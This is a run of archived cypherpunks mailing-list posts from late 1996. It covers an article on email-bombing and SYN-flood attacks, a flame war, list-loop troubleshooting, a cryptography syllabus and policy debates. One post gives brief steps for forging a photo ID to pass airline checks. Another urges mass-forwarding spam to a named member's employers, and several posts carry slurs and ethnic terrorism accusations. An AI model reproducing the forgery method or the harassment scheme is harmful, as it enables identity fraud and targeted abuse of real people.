Internet were stretched thin in their attempts to apprehend serious
cyber-criminals, or to pursue high profile but relatively unimportant
cases against hackers such as Kevin Mitnick. There has been a tendency
on the part of law enforcement and the media to grossly overestimate
the
monetary damage caused by hackers.

"johnny"  and those close to him made it clear that there would be a
continuation of these kinds of email "denial of service" attacks.

These same sources say those few Federal investigators with the Secret
Service and the FBI who are computer literate and savvy about hacking
are stretched thin in attempts to solve serious multimillion dollar
computer crimes, the vast majority of which are committed by insiders
against the companies they work for.

It is far easier, these sources say, to track down, arrest and jail
16-year-old hackers who brag about their exploits to friends and
fellow
hackers than to track down a true professional computer cracker on
assignment from one company to search and steal the files of a
competitor company. While it may take up to three years to investigate
and prosecute one important computer thievery case, teenage hackers
can
be arrested every few months, thus improving the "stats" by which the
FBI and other agencies make their mark and their budgets.

This repeated E-mail denial of service attack will be sure to reignite
the debate about the "moral" issues surrounding hackers and hacking.
What may be ignored -- again --is the failure to rectify the problem
after the first attack back in August. Immediately following the first
E-mail bombing attack, the Computer Emergency Response Team (CERT) was
quick to tell the media that while they had no "solution," they had
"hopes" they would be able to "limit the impact" of these kinds of
attacks.  Today's three-fold attack showed that a six month period of
study  "hoping to limit the impact" has been futile.

Vital communications do not appear to have been slowed down.  The
attack
is a major "inconvenience" to be sure.  Others argue that
"complacency"
is the only true victim of this attack.

The temporary inconvenience caused by a few days loss of E-mail
privileges might seem to pale in significance with those who were
killed
and maimed by the  terrorists' bombing of  the Federal Building, in
Oklahoma City, or at the World Trade Center in New York, or in Atlanta
at the 96 Olympics, or those who opened packages from the Unibomber
and
were killed.

Prominent government officials like U.S. Deputy Attorney General Jamie
Gorelick have called for the development of the equivalent of a
"Manhattan project" to stop hackers, though the specifics of what kind
of "bomb" Gorelick would develop and on whom she would drop "the bomb"
are vague.

Unsafe at Any Modem Speed

On December 16, a computer attack against WebCom knocked out more than
3,000 Web sites for 40 hours, curtailing Website shopping.  The attack
--a "SYN-flood" -- sent as many as 200 messages a second against the
WebCom host computer. This was the same kind of attack that brought
down
the popular New York Internet provider Panix for more than a week in
September.

While Seattle computer security consultant Joel McNamara is
sympathetic
toward WebCom's users problems, he allows less leeway to the company.
"The SYN-flood denial of service attack has been known for months, and
there are a variety of solutions for addressing it," McNamara said, "I
d
be curious as to what, if any, security measures WebCom, a large
provider, had in place to deal with a well-known SYN-flood attack. If
I
couldn't conduct business for 40 hours, I'd have some serious
questions
to ask."

McNamara believes a great deal of the responsibility for the success
of
these kinds of known attacks rests on the shoulders of managers and
systems administrators who do not fully "understand the implications
of
poor security practices.  While the industry hasn't seen this happen
yet, it's just a matter of time before a customer files a lawsuit
against a service provider because of damages caused by ineffective
security," he predicts.

FBI agents have been undergoing some education in computer related
crimes, but sources say the educated ones are few in number and
burdened
by too many cases.  On the other hand, the FBI has singled out small
but
prominent hackers for arrest and prosecution, hoping the jailing of
these individuals who are  well-known to the Net would be a deterrent
to
other younger people considering hacking.  The recent adolescent-like
hacking of the Department of Justice Web site seems to indicate that
hackers aren't all that deterred.

There are other indications that Web page hacks are going to become
more
political, and perhaps even more dangerous than in the past.  The
recent
hack of the Kriegsman Furs company  Web page by animal rights
activists
indicates one new, sophisticated path.  In this attack, the hackers
left
a manifesto, as well as links to animals rights sites throughout the
Web. How easy was it to do? "Security for the site was extremely
weak,"
says McNamara, "The commonly known PHF exploit was likely used to
retrieve a system file, which contained a series of easy to crack
passwords." Presto, chango.  Pro-fur into anti-fur.

"It's too easy to pass the blame off on hackers," McNamara says.  Like
the keys in the car or in the front door, "maintaining an insecure
site
is just an invitation to problems."  Those who were responsible for
today's denial of service attack were careful to repeatedly point out
to
this reporter how "unsophisticated" their attack was and how easily it
could have been avoided if the list managers had only taken minimal
precautions.  "It's kind of like buying new locks and getting an alarm
system after everything in the house is stolen.  Sure it will probably
prevent it from happening again, but if you took the precautions in
the
first place, the damn thing wouldn't have occurred," he concludes.

--------------------

Lew Koch can be reached at: lzkoch@mcs.net

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slothrop@poisson.com (J Durbin)
Date: Fri, 27 Dec 1996 13:05:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis strikes again?
In-Reply-To: <39oLZD125w165w@bwalk.dm.com>
Message-ID: <32c538ec.4294799@smtp.best.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Dec 96 10:08:37 EST, you wrote:

>"Z.B." <zachb@netcom.com> writes:
>
>> On Thu, 26 Dec 1996, Ray Arachelian wrote:
>>
>> > wheee, looks like KOTM subscribed us to a shitload of mailing lists...
>> > Having fun Herr Doktor?
>> >
>> Not only that, but he's probably posting those messages that begin with
>> Fuck_You_Nerds...those appear regularly on alt.revenge, where he is a
>> semi-frequent poster.
>
>Of course, idiot "cypher punks" Zach and Ray are lying again, as usual.
>
>Of course, cocksucker John Gilmore is an even bigger lying idiot.

There sure are a lot of innocent "coincidences" following Vulis
around.

Poor fellow, to have a reputation of years and years of "coincidental"
vandalism besmirching his name.

jd
-- 
Fight spam: http://www.vix.com/spam

jason durbin
slothrop@poisson.com
Stop Reading Here <---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Dec 1996 18:28:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Forged addresses
Message-ID: <v03007874aeea318a8b0e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 27 Dec 1996 15:46:18 -0800
From: Chuq Von Rospach <chuqui@plaidworks.com>
Subject: Re: Forged addresses
To: listmom-talk@skyweyr.com
Mime-Version: 1.0
Precedence: Bulk
Reply-To: listmom-talk@skyweyr.com

At 2:20 AM -0800 12/27/96, Joshua D. Baer wrote:

>What I was concerned about was when I was sending a message with a From
>adress of shaddar+@cmu.edu but a Sender of josh@grinch.res.cmu.edu and with
>an outgoing mail server of skyweyr.com.  I think from your later comments
>that this would still be OK, wouldn't it?

Hmm. (rubbing forehead. God, it's been a long 24 hours...). Hmm. My gut
feel is the answer is "maybe". If someone's attempting to post a
message to a list, I'd have no trouble accepting it if either the From
or Sender matches a known subscriber. That'd be reasonable. I'm not
particularly worried about the mail server in that case. If we end up
with someone forging mail in someone else's name, we deal with it when
it happens and can probably backtrack or otherwise limit it.

If they're trying to subscribe to a list, I have a problem with this,
because the person admits they're subscribing an address not from who
they say they are. I'd want validation of this in some way before
trusting it.

This is where the mailback subscription verifiction starts becoming
moreimportant. Once a person has verified they want on the list, I can
relax a lot more about hard-core validation. It's verifying the address
being subscribed wants to be subscribed that's the nasty piece.

I spent most of last night cleaning up after the spammers, and a good
chunk of this morning. I also rewrote my cgi's to close a bunch of the
loophole and add a few toys to see if they'd trip, and a couple of
hours, the spammer did, so I now know where he's coming from and how
they're doing it (he's spoofing through the ANONYMIZER on top of
everything else...) -- and left a little reminder there, so he now
knows I know. Heh.

And I'm in process of closing the loopholes further. Not what I'd
planned on doing, but obviously, it can't wait any longer. It's not
that they can't be closed to a great degree, only that until this last
round, it wasn't really needed. One idiot screwing it up for a lot of
folks...


--
           Chuq Von Rospach (chuq@solutions.apple.com) Software Gnome
       Apple Server Marketing Webmaster <http://www.solutions.apple.com/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

I got no name or number/ I just hand out the lumber.
But if I get a chance to play/ I'm going to show 'em.
		-- Stick Boy (The Hanson Brothers, SUDDEN DEATH)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 27 Dec 1996 21:53:25 -0800 (PST)
To: Vangelis <vangelis@pnis.net>
Subject: Airline travel ID, was: Credentials without Identity--Race Bits
Message-ID: <v02140b05aeea5cb8f3f5@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>Bill Stewart wrote:
>> I've heard that in less civilized parts of the world you're actually
>> required to carry government-issued ID cards to walk down the street
>> or fly on airplanes.
>
>Umm.. tried to get on a flight without having ID lately?  Doesn't work -
>against policy.  Anti-terrorism policy and all.. it's for your own
>safety, of course.
>--
>Vangelis <vangelis@qnis.net> /\oo/\

Ever wonder whether the airport counter people know a valid ID from a
phoney (or a Law Enforcement ID for that matter)?  Take my word for it,
they don't.  Just scan your current ID, change the name/address fields
output on your handy-dandy dye-sublimation printer and laminate with a kit
from Price-Costco.  If you pay for your ticket in cash be prepared for a
search of your carry-on luggage.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Dec 1996 20:11:38 -0800 (PST)
To: dcsb@ai.mit.edu
Subject: Mo' Better Mail Shenanegans?
Message-ID: <v03007888aeea48e607d8@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


crypto@uhf.wireless.net was subscribed to dcsb@ai.mit.edu, and seems to be
directly zinging messages, sans any identification as forwarded material,
straight off of dcsb to cypherpunks@toad.com. I went in and killed this
address from dcsb, but I don't know how long that's going to last.

I forwarded a story to cypherpunks a while ago from Netly News about a rash
of denial of service attacks that're happening on email accounts around the
net. It looks like cypherpunks is part of that attack, and it looks like
crypto@uhf.wireless.net may be involved. Or not. Anyway, I'll send a copy
of the Netly article to dcsb in another message, for everyone's
entertainment on dcsb.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 21:50:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis strikes again?
In-Reply-To: <199612280022.QAA15873@netcom10.netcom.com>
Message-ID: <DuRmZD138w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> Let's try not to look foolish and paranoid at the same time.

It's hard for "cypher punks" like Ray Arachelian and cocksucker John Gilmore,
given that they're both.  I hope the media people on this mailing list are
having a good laugh.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 21:52:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: interesting
In-Reply-To: <199612280142.RAA29840@geocities.com>
Message-ID: <gXRmZD139w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


pSIONIC dAMAGE <zerofaith@geocities.com> writes:

> does anyone remember 2001: A Space Odyssey? Remember the computer's name.
> HAL
> Then Think about the letter that follows each in the alphabet. Arthur Clarke
> said it was just a coincidence...

Microsoft claims that WinNT (WNT) is a successor to VMS.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 22:00:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: multiplicity
In-Reply-To: <Pine.LNX.3.95L01at.961228055623.24013B-100000@localhost>
Message-ID: <VLTmZD140w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Lovett <sl@pobox.com> writes:
> My guess is that someone has looped mailing list subscriptions - see the
> Received headers on your message for example:
>
> >Received: from uhf.wdc.net (uhf.wdc.net [198.147.74.44]) by toad.com
> (8.7.5/8.7.3) with ESMTP id XAA15048 for <cypherpunks@toad.com>; Thu, 26
> Dec 1996 23:47:01 -0800 (PST)
> >Received: from toad.com (toad.com [140.174.2.1]) by uhf.wdc.net
> (8.8.4/8.6.12) with ESMTP id CAA25800 for <crypto@uhf.wireless.net>;
> Fri, 27 Dec 1996 02:54:13 -0500 (EST)

That "somebody" might very well be the lying Armenian terrorist Ray
Arachelian from Earthweb LLC.  You can use procmail or a similar program
to auto-forward all the spam with wdc.net in the Received headers to Ray's
employers:  jack@earthweb.com, murray@earthweb.com, and nova@earthweb.com.

Cocksucker John Gilmore is a paranoid asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 22:00:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fyodor / Re: SPAM from plaidworks.com
In-Reply-To: <Pine.LNX.3.91.961228102039.7737Z-100000@freenet.bishkek.su>
Message-ID: <eqTmZD141w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Fyodor Yarochkin <fygrave@freenet.bishkek.su> writes:

> >
> > They're innocent people being framed by the SDPA terrorist.
> > Please forward all unsolicited spam to <ray@earthweb.com>.
> terrorist.. how cool;)))))))))))))))))))))).. anyone wanna teach me this?:)

Being in Pishkek, Kyghyzstan, you're probably well aware of the Nazi-like
atrocities perpetrated by the Armenian criminals engaged in "ethnic cleansing"
of the occupied Azerbaijani territory. You may also be aware of ASALA/SDPA,
the terrorist Armenian organization that specializes in assassinating
Turkish diplomats and civilians. I think the FBI should look very seriously
at the connection between ASALA terrorists and the "cypher punks" gang.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@veracruz.net (Adam Breaux)
Date: Sun, 29 Dec 1996 03:51:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: With my deepest regards....
Message-ID: <19961228093152972.AAA292@monalisa>
MIME-Version: 1.0
Content-Type: text/plain


I am withdrawing from this list. Not because of the volume of 
email...that I can deal with...but what I cannot deal with is the 
volume of garbage and egotistical ranting that seems so prevalent in 
what should for all sakes and purposes be a discussion of cyphering 
and security. Apparently the name of this list is designed to 
mislead...because of all the posts, a grand total of 5% proved worth 
reading at all.

Thank you and good day.
---
Adam Breaux
admin@veracruz.net
http://www.veracruz.net       {Corporate Page }
http://www.abyss.com          {Extracurricular}
http://www.iso-america.com    {In Search Of...}

"Violence is a cruel world doing what it 
does best...break the habit...BE NICE" --- me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Lovett <sl@pobox.com>
Date: Fri, 27 Dec 1996 18:40:25 -0800 (PST)
To: troubled@mailmasher.com
Subject: Re: multiplicity
In-Reply-To: <199612270420.UAA10292@mailmasher.com>
Message-ID: <Pine.LNX.3.95L01at.961228055623.24013B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996 troubled@mailmasher.com wrote:

> Just great!  The first message I send to this mailing list
> and somehow multiple copies of it get posted.
> 
> I honestly don't know how it happened, but I'll try to be
> very careful in the future and watch for anything I might
> have carelessly done which could have caused this.

My guess is that someone has looped mailing list subscriptions - see the
Received headers on your message for example:

>Received: from uhf.wdc.net (uhf.wdc.net [198.147.74.44]) by toad.com 
(8.7.5/8.7.3) with ESMTP id XAA15048 for <cypherpunks@toad.com>; Thu, 26
Dec 1996 23:47:01 -0800 (PST)
>Received: from toad.com (toad.com [140.174.2.1]) by uhf.wdc.net
(8.8.4/8.6.12) with ESMTP id CAA25800 for <crypto@uhf.wireless.net>;
Fri, 27 Dec 1996 02:54:13 -0500 (EST)

This gets repeated several times in some messages.

Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 20:47:21 -0800 (PST)
To: "Shit F. Brains" <cypherpunks@toad.com>
Subject: Re: Mark Mage is a Thief
In-Reply-To: <32C37D57.2AE4@toad.com>
Message-ID: <Pine.LNX.3.91.961228094618.7737E-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Shit F. Brains wrote:
> Dear Troubled,
>   The guy's a fucking thief, from what I've heard.
>   It seems the FBI is looking for him for a nasty number he
> pulled on some retired people, ripping off their life savings.
> He seems to have the IRS
IRS? Wazzzat?

> after him, as well.
>   I'd steer clear of him.  He's bad news.
re you sure>?:)

-X----- Fyodor --- fygrave@freenet.bishkek.su --------------------------X--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 21:06:23 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Mark Mage is a Thief
In-Reply-To: <1H7kZD124w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.91.961228100413.7737P-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In my opinion, just because the FBI and the IRS don't like someone,
> s/he ain't necessarily a bad person.
agreed... and even more some persons, whom FuckBI doesn't like, are nice 
ones.. *g*
-f




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 21:23:41 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Fyodor / Re: SPAM from plaidworks.com
In-Reply-To: <g0RLZD129w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.91.961228102039.7737Z-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


> 
> They're innocent people being framed by the SDPA terrorist.
> Please forward all unsolicited spam to <ray@earthweb.com>.
terrorist.. how cool;)))))))))))))))))))))).. anyone wanna teach me this?:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 29 Dec 1996 03:56:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Access fees idea dropped for ISPs?
Message-ID: <199612281857.KAA13027@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 28 Dec 1996 02:35:29 -0500 (EST)
>From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
>To: jcobb@ahcbsd1.ovnet.com
>Subject: DAVID AWAKES!  12 28 96  
>
>    Friend, 
> 
>    12 27 96 San Francisco Examiner distributes a newsstory 
>    headlined: 
> 
>            INTERNET SERVICE COMPANIES WIN VICTORY 
>                  WHEN FEDS DROP ACCESS FEES 
> 
> 
>    The story reports: 
> 
>       The FCC is in the process of making sweeping changes 
>       to connection, or access, fees that could result in 
>       a huge drop in phone rates for residential and busi- 
>       ness customers. 
> 
> 
>    The FCC's counsel for new technology, Kevin Werbach, says 
>    that as part of that process: 
> 
>       "The commission raised the specific question of wheth- 
>       er [ISPs] should pay access charges....  [The FCC] ten- 
>       tatively concluded that the answer is 'no'." 
> 
> 
>    That tentative conclusion tallies with FCC past practice: 
> 
>       In 1983, the FCC exempted Internet providers from pay- 
>       ing the same kind of per-minute access charges that 
>       long-distance companies pay to connect to local cus- 
>       tomers. 
> 
> 
>    The story reports the Internet Access Coalition has: 
> 
>       ...assiduously pressed the FCC for weeks to ensure 
>       that Internet users have access to a low, flat month- 
>       ly rate. 
> 
> 
>    Who are some of these IAC good guys? 
> 
>       ...Intel, Apple Computer, Netscape Communications, A- 
>       merica Online, IBM, AT&T, Digital Equipment and Compaq 
>       Computer.... 
> 
> 
>    The story reports that the FCC connection-fees process: 
> 
>       ...to trim the $23.4 billion in annual fees that long- 
>       distance carriers pay local phone companies...is expec- 
>       ted to be formally approved in the spring following 
>       public hearings. 
> 
> 
>    We'll see what happens when the tentatives roll around! 
> 
>    The tentatives? 
> 
>    This latest FCC decision and the PROMISE of "a low, flat 
>    monthly rate" --maybe even for end-users. 
> 
> 
> 
>    Cordially, 
> 
>    Jim 
> 
> 
> 
>    NOTE. The newsstory's URL: 
> 
>          http://www.nando.net/newsroom/ntn/info/122796 
>                      /info3_20620.html 
> 
> 
>          Wire services contributed to the Examiner's story. 
> 
>          This critical essay was composed 12 27 96. 
> 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 29 Dec 1996 03:54:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Advanced cryptography course
Message-ID: <v0300789faeeb19939717@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Sat, 28 Dec 1996 12:24:41 -0500 (EST)
From: Christof Paar <christof@ece.WPI.EDU>
To: DCSB <dcsb@ai.mit.edu>
Subject: Advanced cryptography course
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Christof Paar <christof@ece.WPI.EDU>

This is an announcment for an advanced cryptography course in the greater
Boston area:

Here comes the syllabus for the course EE 589R, Advanced Topics in
Cryptography and Data Security. The first class will be held on Monday,
January 20, at Worcester Polytechnic Institute.

The course is a continuation of EE 578/CS 578, Cryptography and Data
Security. It will provide a deeper insight into several areas of cryptology
which are of great practical and theoretical importance. The three main
areas treated are: Detailed analysis and implementation of public key
algorithms, advanced protocols, and modern attacks against cryptographic
schemes. We will address many topics which are usually only treated in the
research literature.

Please feel free to get in touch with me any time if you have further
questions about the course.

Regards,

Christof Paar

****************************************************************************
Christof Paar                      http://ee.wpi.edu/People/faculty/cxp.html
Assistant Professor                email:  christof@ece.wpi.edu
ECE Department                     phone:  (508) 831 5061
Worcester Polytechnic Institute    fax:    (508) 831 5491
100 Institute Road
Worcester, MA 01609, USA
***************************************************************************




EE 579R, ADVANCED TOPICS IN CRYPTOGRAPHY AND DATA SECURITY

                       Spring `97
                  WPI, Monday 5:30-8:30


                       SYLLABUS

Week 1
Efficient implementation of RSA: The Chinese Remainder Theorem.

Week 2
Efficient implementation of public-key systems over finite fields: Galois
fields theory.

Week 3
Implementation of Galois field arithmetic.

Week 4
Efficient arithmetic with long numbers: Montgomery and Karatsuba-Ofman
algorithm.

Week 5
Efficient exponentiation algorithms.

Week 6
Attacks against the discrete logarithms: Shank's algorithm and Pollard's-rho
method.

Week 7
Midterm Exam

Week 8
Attacks against the discrete logarithms: Index calculus method.

Week 9
Attacks against block ciphers: Differential cryptanalysis.

Week 10
Block ciphers from arithmetic operations: IDEA.

Week 11
Secret sharing and threshold schemes.

Week 12
Zero knowledge identification schemes.

Week 13
Selected topics, depending on class interest.

Week 14
Final Exam.


TEXTBOOK

Menezes, van Oorschot, Vanstone: Handbook of Applied Cryptography. CRC
Press, October 96, ISBN 0-8493-8523-7, $80







~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 29 Dec 1996 03:57:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Limiting copyright
Message-ID: <v02140b02aeeb542e17c4@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


GENERAL
The US Constitution empowers Congress to pass laws "to promote progress of
science and [the] useful arts." Congress has chosen to accomplish this
constitutional goal by granting authors a limited set of exclusive rights
in their works. The founding fathers wanted, through copyright, to
encourage the useful arts and thereby offer to the public the fruits of
these artists.  Copyright protects all original works of authorship,
including such things as personal letters and corporate memoranda, from the
moment they are first fixed in a tangible form.

About 50,000 U.S. books go out-of-print each year.  The lack of continuous
availability of these works runs counter to the implicit balance sought by
the founding fathers between the needs of the public and copyright holders.
In the past copyright holders could reasonably maintain that economics
prohibited keeping works in print, with practical, economic and ubiquitous
on-line means, this is no longer a barrier.

This being so, why should copyrights on "significant" works (e.g., written
one's with length's greater than 20,000 words) which have been
commercialized continue when the public cannot gain ready access to copy of
same?  This logic follows from the use-it-or-lose-it concept of trademarks.
Changes are need to ensure the public that such "significant"
commercialized copyright works are continuously available.

Under this recommendation the works must remain available from the
copyright holder or their licensee, specialty resellers (e.g., hard to find
book locators)  wouldn't count, but electronic publication would.   If a
copyright holder fails to keep a work continuously available, then after a
brief interval (e.g., six months) the copyright would lapse.

SOME DETAILS
Reversion
Often, the owner of copyright (the author) is different from the owner of
the privilege to publish of a book or item.  This privilege is assigned
by a contract between an author and publisher, mediated by an agent and
editor.

Once signed, the author has little influence on the decision to keep a
book in print (unless they are big-time authors, like Danielle Steele or
Stephen King.)  Furthermore, changes in editors, editorial direction,
management, ownership, etc., can affect decisions on whether or not to
support a book, keep it in print, etc., none of which the average author
can influence.  Usually, contracts between authors and publishers have
rights reversions clauses, returning all rights to the author, once a book
goes out-of-print.  However, publishers have come up with a new term
"out-of-stock-indefinitely" which fundamentally means "out-of-print" but
doesn't trigger reversion of rights.

Therefore, a part of the provision might ban author-publisher contract
clauses with these reversion changes. This would be similar to music
copyrights/contract law which limit a composers right to sign over more
than a certain percentage of their interest in a work to the publisher.

Revision
An author may sometimes seek to remove a work from circulation, perhaps the
work becomes embarrassing or dated and needs to be revised.

So, another part of the provision might allow the author to irrevocably
place the copyright for a work to be withdrawn in a state of "limbo" such
that no one (including the author) could publish the work until the
author's death (or the  copyright's normal expiration date).  Copyright for
revised works would permit the author to replace one work with another by
relinquishing the copyright for the former work (which cannot be
republished until the copyright's normal expiration date.)

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jazzmin Belle Sommers <jazzmin@ou.edu>
Date: Sun, 29 Dec 1996 03:58:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: ssn hack
Message-ID: <32c5d3216ed5002@cliff.ou.edu>
MIME-Version: 1.0
Content-Type: text/plain


heh.

This was so simple, it still confounds me.

I was asked for my social security number whilst writing a check last night
(my driver license doesn't have it on there).  I just said, "oh, I don't
have one, I'm not a citizen."

She bought it!  I got asked where I belonged to, so I said Germany (not
actually a lie, it's my heritage).  Next time I think I'll say Belgium.
What's that itty bitty country between France and Spain?  Angorra?  Yeah.
That's it.

I still find that the best line of defense regarding privacy is a complete
second identity.  Does anyone know how to apply for proper papers (taxpayer
ID#, checking account, picture ID of some sort) for a second identity?  As
far as I know, it is not illegal to have one, as long as it is not used for
fraud.  I'm an artist, yeah, that's it.

What, you really think someone's actual name is Jazzmin Belle Sommers?  Get
outta town!


Jazz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dennis S." <dws@gonif.com>
Date: Sun, 29 Dec 1996 03:57:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Au Revoir to Yahoo's reverse telephone number lookup service
Message-ID: <32C5D3F0.6691BBB7@gonif.com>
MIME-Version: 1.0
Content-Type: text/plain


Below is a letter I recently sent to Yahoo regarding the discontinuation
of their reverse telephone number lookup service.

[ http://www.yahoo.com/docs/info/people_faq.html#numbers ]




Dear Yahoo:


When I saw your reverse-number lookup had disappeared, I was surprised, 
and over the past several days have grown angry about it.  I wouldn't 
even be able to say I was angry at Yahoo, it would be nice for Yahoo to 
show backbone, but that is definitely something "above and beyond" what 
could be expected of a company such as yours, I am an admin and I 
certainly know what it feels like when a user puts up a controversial web 
page (or spams, or whatever).

The thing that really angers me is that large corporations and 
institutions, and upper class people already have access to not just 
reverse lookup capability for listed numbers, but for unlisted numbers as 
well.  I can get a CD-ROM for the type of service you were selling from a 
store for $100 or so, and unlike yours, can use it to easily created junk 
mailing lists etc.  And for more money I can get access to people's 
unlisted numbers from on-line services and other sources, plus a lot more 
information.

I should point out here that your service was useful to me for 
non-"nefarious" purposes.  For example, I often have phone numbers 
written on scraps of paper with no indication as to who/what the number 
is.  I suppose my co-workers and I should always write down the name of 
everyone we're calling back over it, even if it isn't necessary at that 
moment, but such is life.  Reverse lookup helped decode these numbers, 
mysterious numbers on my phone bill, and so forth.

I can understand the people who wander onto your page and dislike the 
fact that people can get their name and address from their telephone 
number.  But that is _not_ the issue, because corporations and people who 
can afford to pay $300 for "Tickle Me Elmo" already has access to that
information, and even more which is not even in the public domain.  The issue
is that this information is being taken away from people who can not afford
it.  What's wrong with giving the average lower/middle class person access to
that information?  Well, obviously a lot to some people.  With all the hubbub
over whether or not naked girls will be displayed on our screens, at 
least in the U.S., the more dull background maneuvers - the shutdown of 
anon.penet.fi, the continued mess of encryption export, CyberSitter's 
secret censorship of political content etc., forever creep forward.  When 
all is said and done, you were simply giving less privileged individuals access 
to powerful information.

Well, these types of letters can run on fairly long, I've tried to 
